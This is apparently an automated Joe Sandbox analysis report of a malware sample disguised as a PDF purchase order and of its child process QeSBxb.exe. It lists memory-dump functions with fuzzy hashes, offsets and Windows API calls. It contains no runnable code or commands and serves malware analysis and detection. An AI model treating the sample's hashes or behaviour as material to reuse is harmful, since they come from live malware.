Opcode Fuzzy Hash: f675e998f2360b0225f5b300ff7dfa9ca3bc0508e8a9f964309e6acb71495f8f
Instruction Fuzzy Hash: 63212336605229DFCB119F69E4486AE3BA2FB95304F01842AF8058F395DB34DD59DBA0

Function 01524285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8ee20c1cf60f805b2d84e94ed97de4ff877e662b8c53e6035694be4cc1c7068
Instruction ID: 209bce9ccd16465973095db27dda9d656ab5f23ae390ab77ba5fde1af8adc925
Opcode Fuzzy Hash: f8ee20c1cf60f805b2d84e94ed97de4ff877e662b8c53e6035694be4cc1c7068
Instruction Fuzzy Hash: 2B319478E01308DFCB44DFA9D58489DBBB2FF49705B2044A9E819AB364DB35AD45CF11

Function 01529761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c051e73a46526b83fce1958e7f21c99732a5b39aa9777ecab55458e1b6c0013
Instruction ID: 0af97869719f3e99c67d16fba0cb8651e3c9356117bd373a8be40e69ccb4ab40
Opcode Fuzzy Hash: 4c051e73a46526b83fce1958e7f21c99732a5b39aa9777ecab55458e1b6c0013
Instruction Fuzzy Hash: 72217C35E01268DFDB15CFA6D550AEDBFB6FF4A208F188059E410AB394DB34D941DB60

Function 015262F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1d529faea6972b9c6e342f18b3faed8cb8be81ba4e726eef7001442378891b2
Instruction ID: deec5109cf97016407c1588c736bfbaa13abdcafd612f41d72b3e39d308d174c
Opcode Fuzzy Hash: e1d529faea6972b9c6e342f18b3faed8cb8be81ba4e726eef7001442378891b2
Instruction Fuzzy Hash: B211C1363055218FD7165B2EC46852E7BA2BF9A7553194469E916CF3A4CF30CC028B90

Function 015227F0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc52652fa87aa4d0c4a86aa23adcbd6c439a9783ad1e92a1b3a93c3686c39b37
Instruction ID: 94172fa449b3c194a4b28c0efd679d30645afa4bdea79e64d0934a7cccb0dd1e
Opcode Fuzzy Hash: dc52652fa87aa4d0c4a86aa23adcbd6c439a9783ad1e92a1b3a93c3686c39b37
Instruction Fuzzy Hash: 5021F379C0525A8FCF11DFA9D8455EEBFF0FF4A204F10426AD815B7254E7301A45DBA1

Function 0152F640 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4261fafc412dd0037fc2f702d5cbe0f0e4f12ccdbb6344e7e376a05652e7a51
Instruction ID: 9c3a537e632fe5ba973e82b027afd3989b54947f07fce0c6c0cc53b0d572ced3
Opcode Fuzzy Hash: c4261fafc412dd0037fc2f702d5cbe0f0e4f12ccdbb6344e7e376a05652e7a51
Instruction Fuzzy Hash: D82147B0D0030D9FEB55DFAAD94079EBFF2FB85700F0085AAC458AB264EB345E458B81

Function 01525E98 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 171ffa1c4bea5ba18295a7ed3f96e642e5bfb1746828fc0a8a28091dbdaa262d
Instruction ID: fc0914a96b15410fc865fabee4cda3e78b2606657b426ea99a2defe3e5797936
Opcode Fuzzy Hash: 171ffa1c4bea5ba18295a7ed3f96e642e5bfb1746828fc0a8a28091dbdaa262d
Instruction Fuzzy Hash: AD114C336042645FCB228E6998005EE3FA6FBDA610B08805BF904CF284EA35CD158791

Function 014CD54F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880326831.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_14cd000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction ID: 96dab9d731d67fc7ccac5bd7e4c85ffdaa7c1effa57c7659ae7d4c79789ee26f
Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction Fuzzy Hash: C111AF7A904280CFCB16CF54D5C4B16BF72FB88724F2485AED8490B667C33AD456CBA2

Function 0152F650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f5fa55be534b98a38527801542ab664bbe67f1d3ea2f267c5f6fce08cb46a1d
Instruction ID: 9d01774aadddc9e586a69d58fccd42628f7192e95631bf23d4e5392eab34fba4
Opcode Fuzzy Hash: 8f5fa55be534b98a38527801542ab664bbe67f1d3ea2f267c5f6fce08cb46a1d
Instruction Fuzzy Hash: B6114970D0020DDFEB44EFAAD94079EBBF2FB84701F00C5AAC418AB264EB345E458B81

Function 01528E93 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aabc3c3d6a796ff2251a5570c190e426e181c040468936278e5bfa11fa173093
Instruction ID: b4d533e402e2b55180fe2ab0debfe1cafde813414e8c7e8a4810cfd8a7316d98
Opcode Fuzzy Hash: aabc3c3d6a796ff2251a5570c190e426e181c040468936278e5bfa11fa173093
Instruction Fuzzy Hash: 5611C2323102268FEB249BA8D854BAE7BAABF84605B104069E225CF2D5DF35CC05C721

Function 014DD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880431828.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_14dd000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction ID: d14421829bb145fde25e24b8668c2cca48ea4c00fe54759e60b35af6a1620c90
Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction Fuzzy Hash: 7611BE75904244CFCB16CF64C5D4B16BBA2FB84318F24C6AAD8494B3A3C33AD44ACF51

Function 0152E8E8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eb5683d7de98ec15a42b36d24ea02d96ed7f6a210ee43cdcfb3a6f4877e589c
Instruction ID: b95865ae2fe013d065f8010d1c25ef56023c406f197e477a633f5295ef29690a
Opcode Fuzzy Hash: 1eb5683d7de98ec15a42b36d24ea02d96ed7f6a210ee43cdcfb3a6f4877e589c
Instruction Fuzzy Hash: DD1179B5D0030ADFCB01CFA8D8449AEBBB1FB8A300F004066E820A7390D7345E4ACF91

Function 0152ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a61a24ab4ffa47128af8286e0c53ee30da929a1cf15e169879c5e25a2f3ac22f
Instruction ID: 668dc9222acca89d390884af78c971516c9054c56399daf75d44cd0481c981e1
Opcode Fuzzy Hash: a61a24ab4ffa47128af8286e0c53ee30da929a1cf15e169879c5e25a2f3ac22f
Instruction Fuzzy Hash: 43F0F6363002204B972A5A2ED454A2EBADEFFCAA553054079F909CF7A1EE21CC03C780

Function 01529D59 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a2f9adeb803530e6afe0948913f540b4ec79eb93d6c2dfdf5ddeae98b8881d7
Instruction ID: a021a19b3fd43284358be4cf342cfd16c4f95b62eb16a40ca2b0cf93ff2009dd
Opcode Fuzzy Hash: 6a2f9adeb803530e6afe0948913f540b4ec79eb93d6c2dfdf5ddeae98b8881d7
Instruction Fuzzy Hash: 8CF0A93A3002256FD7182AA59850A7FBACBFFCD264F148025FA09CB384DE71CC11A3E0

Function 01526739 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4f982f85c5eae1e79c544ce7c7767459abc6dc2a760c9676ab41d6596aa0581
Instruction ID: 593b7029188ca04497afbb437483045f2776c1ef60df0cc79466d9f7e5aedd9f
Opcode Fuzzy Hash: c4f982f85c5eae1e79c544ce7c7767459abc6dc2a760c9676ab41d6596aa0581
Instruction Fuzzy Hash: 6FE0D8314093D14FE7938735AC684493F75FAA300470C95D7D4004E6ABDE740C0A8B22

Function 015228B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 250ebd0ecdff5b8e44b61ca4e32444f23f279e7ea67025cfeccd4c41b7d8d42c
Instruction ID: e8071344c1759f604ed9db9e60af2667971d76bf36252c2dac849e7754d7ad73
Opcode Fuzzy Hash: 250ebd0ecdff5b8e44b61ca4e32444f23f279e7ea67025cfeccd4c41b7d8d42c
Instruction Fuzzy Hash: 8BD05B31D2022B97CB10E7A5DC044DFF73CEED5261B904626D52537150FB712659C6E1

Function 01528EF6 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d731f6b9a28facd9b0a0e039eaf45a8b70cce241cd80f2fda15ef55ea6c58a9
Instruction ID: 305910c67ba83dd25fa589959b861f748a99e36434e888e5b0e3279bcdac4d15
Opcode Fuzzy Hash: 3d731f6b9a28facd9b0a0e039eaf45a8b70cce241cd80f2fda15ef55ea6c58a9
Instruction Fuzzy Hash: 98D0123354D1342ED775408D7C45DFB67DDE3C23B4B21013BFA2CD728198424C8145A4

Function 015228AB Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02127158a4ffa7408f18b2e25380510675b3cb69129826d7c240bae0f1260847
Instruction ID: 05cef195afb58a1dfa99338b1d9f6ed6700d85a635ce06bdb8e7e075fee50cbf
Opcode Fuzzy Hash: 02127158a4ffa7408f18b2e25380510675b3cb69129826d7c240bae0f1260847
Instruction Fuzzy Hash: 14D01275D20226C6CB10EBA1AC440DDB738AE95225B548626D535372A0EB71175986D1

Function 0152D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52be3132737de38e0c28b9a50e0e338e4b6e7fe18a6d079d411aa9844b9be45c
Instruction ID: d53822e139292fcd20ebc3bdc421f602d87f2bd234880a0279981730ca0aac6b
Opcode Fuzzy Hash: 52be3132737de38e0c28b9a50e0e338e4b6e7fe18a6d079d411aa9844b9be45c
Instruction Fuzzy Hash: 7FD04239E44109CBCB70DFA8E4884DCFBB1FB89226B10542AD92AA7651D63064559F11

Function 0152AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c79b77d734461f530a4ad2602933ea46e2a7f06e67ca6c6d7bd90d56c9f3c9f5
Instruction ID: e014e00285d76c506837f6226e39aef9ed0be64aba3a1114d661c1ff4804c3cf
Opcode Fuzzy Hash: c79b77d734461f530a4ad2602933ea46e2a7f06e67ca6c6d7bd90d56c9f3c9f5
Instruction Fuzzy Hash: 38D0673AB000089FCB149F99E8409DDF7B6FB98221B048156E925A7264C6319925DB60

Function 01526748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba172aa1683b782b47fabf5f88063817790fe4013a57bb2a11414d54bc7bc3dd
Instruction ID: 4879651b8292058bc82a9dc781f114cc41c8253799b09e7865e586d9acd2e42f
Opcode Fuzzy Hash: ba172aa1683b782b47fabf5f88063817790fe4013a57bb2a11414d54bc7bc3dd
Instruction Fuzzy Hash: 11C012340003194FE781E767FC54555372AF7E05057409614D4050965EDFB86C864BA5

Analysis Process: QeSBxb.exePID: 6708, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	46
Total number of Limit Nodes:	2

Executed Functions

Function 087F6B84 Relevance: 1.6, APIs: 1, Instructions: 58
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 087FABE7

Memory Dump Source

Source File: 00000009.00000002.1504130676.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_87f0000_QeSBxb.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: d39a4dfa116a2d833e0927edc9746e344b1e5922699a60251817fd45adfba5bb
Instruction ID: 5a892ceab92ff76e2677cb1e82299ae98e6b151776a8d156370907d524a64ae5
Opcode Fuzzy Hash: d39a4dfa116a2d833e0927edc9746e344b1e5922699a60251817fd45adfba5bb
Instruction Fuzzy Hash: 0721EDB59003599FCB10CF9AD884ADEFBF5FB48314F10852AEA18A7351C374A954CFA0

Function 087FAB60 Relevance: 1.6, APIs: 1, Instructions: 57
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 087FABE7

Memory Dump Source

Source File: 00000009.00000002.1504130676.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_87f0000_QeSBxb.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: d4c08a6e18ee5e0b2f7b3abb2b6c11ec7be2f80c05d84b2dbb34e8b707d10ac8
Instruction ID: 5539b3ae7a5e0f99dfb940a16199f8136df11d3d4abb28f0db6c02e34a42fbde
Opcode Fuzzy Hash: d4c08a6e18ee5e0b2f7b3abb2b6c11ec7be2f80c05d84b2dbb34e8b707d10ac8
Instruction Fuzzy Hash: FD21F0B58013499FCB10CF9AD884ADEFFF5BB48324F10852EE928A7210C374A544CFA1

Function 02D97A1C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02D990C1

Memory Dump Source

Source File: 00000009.00000002.1496934379.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d90000_QeSBxb.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9ed0f95e210996f9a1b31dd25e73a43cfba0d99bb30e1c73e2d9818a3ea2d970
Instruction ID: 8bc21b03c1b1eb6e3667d767a31f242ed8ca78dbcd60891173bd6e3a060179c4
Opcode Fuzzy Hash: 9ed0f95e210996f9a1b31dd25e73a43cfba0d99bb30e1c73e2d9818a3ea2d970
Instruction Fuzzy Hash: A141CF71D00719CBDB24DFA9C848BDEBBB5BF89704F20816AE408AB251DB756945CF90

Function 087FB254 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringW.KERNELBASE(00000000), ref: 087FBFE8

Memory Dump Source

Source File: 00000009.00000002.1504130676.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_87f0000_QeSBxb.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 34322839dfcc06090c12c87b9350b759a1997097994cccb49b743a9b186399fc
Instruction ID: b6b551824a9663a0c37f05a5f139353f1c3bc4a322e957041f3cc1eeb8599f6f
Opcode Fuzzy Hash: 34322839dfcc06090c12c87b9350b759a1997097994cccb49b743a9b186399fc
Instruction Fuzzy Hash: 251156B1C0460A9BCB10CF9AD444BAEFBF4FB48721F10862AE918B3340C774A944CFA1

Function 087FBF71 Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringW.KERNELBASE(00000000), ref: 087FBFE8

Memory Dump Source

Source File: 00000009.00000002.1504130676.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_87f0000_QeSBxb.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 9405c0166aa2be935aaf48c0083cc0716056154586db1a917e4704a1e2471d12
Instruction ID: 04a00636a09d5a97805e51e7f41cd97c80f4c6e0e77d25d90c922320a56f3620
Opcode Fuzzy Hash: 9405c0166aa2be935aaf48c0083cc0716056154586db1a917e4704a1e2471d12
Instruction Fuzzy Hash: DC1144B1D0064A8FCB14CF9AD444BAEFBF0FF48320F10852AD818A7640C7746545CFA1

Function 02D9E298 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02D9E2FE

Memory Dump Source

Source File: 00000009.00000002.1496934379.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d90000_QeSBxb.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 319239c830208e8c33fdd46aaada62d65b484639c94834d2cc5c6817c91df0ea
Instruction ID: d095dd4b2737c535b10e5ad094bdb29bada35f58f70f416f443398cbc0a9ae0c
Opcode Fuzzy Hash: 319239c830208e8c33fdd46aaada62d65b484639c94834d2cc5c6817c91df0ea
Instruction Fuzzy Hash: D11110B6C003498FDB20CF9AD444BDEFBF4AB88324F10881AD859A7300C379A545CFA1

Function 087FB260 Relevance: 1.3, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(00000000), ref: 087FC087

Memory Dump Source

Source File: 00000009.00000002.1504130676.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_87f0000_QeSBxb.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e1952b15c2e303f02ebade9a0f87064f68de909c829280a9ed8d930a8451771f
Instruction ID: 1a3c18692450db54e019d4f46bd4a3236a598f8a9ea9315c8c12dc9296625cd8
Opcode Fuzzy Hash: e1952b15c2e303f02ebade9a0f87064f68de909c829280a9ed8d930a8451771f
Instruction Fuzzy Hash: 281128718007598FDB20DF9AD844BEEBBF4EF88321F108469D558A3341D778A945CFA5

Function 087FC020 Relevance: 1.3, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000), ref: 087FC087

Memory Dump Source

Source File: 00000009.00000002.1504130676.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_87f0000_QeSBxb.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c51817869be4c15f1b7ad8fe4540928186a1e8f6db795cc6c4ef7bcf7f9205bc
Instruction ID: 09d93903b6087250cb7618212bcfddaacc7c22703e3be021d828a3d2ae72ad18
Opcode Fuzzy Hash: c51817869be4c15f1b7ad8fe4540928186a1e8f6db795cc6c4ef7bcf7f9205bc
Instruction Fuzzy Hash: 301155B18003498FDB20DFAAC844BDEBBF4EF48320F10846AD558A3391D378A545CFA5

Function 0137D080 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1495221720.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_137d000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1009d2c79b759ebeb61769f21d76b9cb1cce7b31c3e4f973e79709276c734fa3
Instruction ID: a8440b8e52e46cd6837362b91d1a5fe8d42a6543b0f5073eb526af6c8c417ac7
Opcode Fuzzy Hash: 1009d2c79b759ebeb61769f21d76b9cb1cce7b31c3e4f973e79709276c734fa3
Instruction Fuzzy Hash: 5F316F740493818FC7178F64D994611BFB1EF46324F1985EAC9458F267C33E984ADB62

Function 0136D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1495172028.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_136d000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31a39741e86f0952e8260339f9c5469ffa640f1765b838355d64710d5ff6885a
Instruction ID: 5b4d014ac2cd3f5c1e8ad4789628a48d70e80adb80b9e0d3b872ac497958173b
Opcode Fuzzy Hash: 31a39741e86f0952e8260339f9c5469ffa640f1765b838355d64710d5ff6885a
Instruction Fuzzy Hash: 77212171604344DFDB01DF54D8C0B26BF69FB8832CF20C169EA890AA5AC336D416CAA2

Function 0137D294 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1495221720.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_137d000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee5bb0b4f16463c501dff108afcdcdba4e71d0cff417ec6cb52ac0e4147e81de
Instruction ID: 0575eb51b4e8a70392b49c9a0f09d3223f92212ed77f9821318c17572ab5aa63
Opcode Fuzzy Hash: ee5bb0b4f16463c501dff108afcdcdba4e71d0cff417ec6cb52ac0e4147e81de
Instruction Fuzzy Hash: 14212275604304EFEB11DF94D9C4B26BBA5FF88728F24C56DD8490B642C33AD806CA62

Function 0137D0DC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1495221720.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_137d000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4ab9b99582cd6bd561b82d765c9788bdd58c4aa0a7b406a0a6ca8791c11bfd
Instruction ID: f8a80525664bfbcb09247e2f2da0959e21dda7cce5f2b76b671728da66221a3f
Opcode Fuzzy Hash: 7c4ab9b99582cd6bd561b82d765c9788bdd58c4aa0a7b406a0a6ca8791c11bfd
Instruction Fuzzy Hash: 26212275604304DFDB51DF54E9C4B16BB65FF84228F20C56DD80A0B796C33ED846CA62

Function 0136D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1495172028.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_136d000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction ID: 6f70ff486315c1a169b66a6b05b31ea5266eeb90d0df8db319601ef62a9993d0
Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction Fuzzy Hash: 6011E676604284CFCB16CF54D5C4B16BF72FB84328F24C6A9D9490B65BC33AD456CBA1

Function 0137D28F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1495221720.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_137d000_QeSBxb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction ID: cb50d3d0ff4e13f308ba4e555a1fe4ccf2096fb270fec85c60cb1491f5dbc86f
Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction Fuzzy Hash: 3311BB79504280CFDB12CF54D5C0B15BFA2FB84228F28C6AAD8494B693C33AD40ACB62

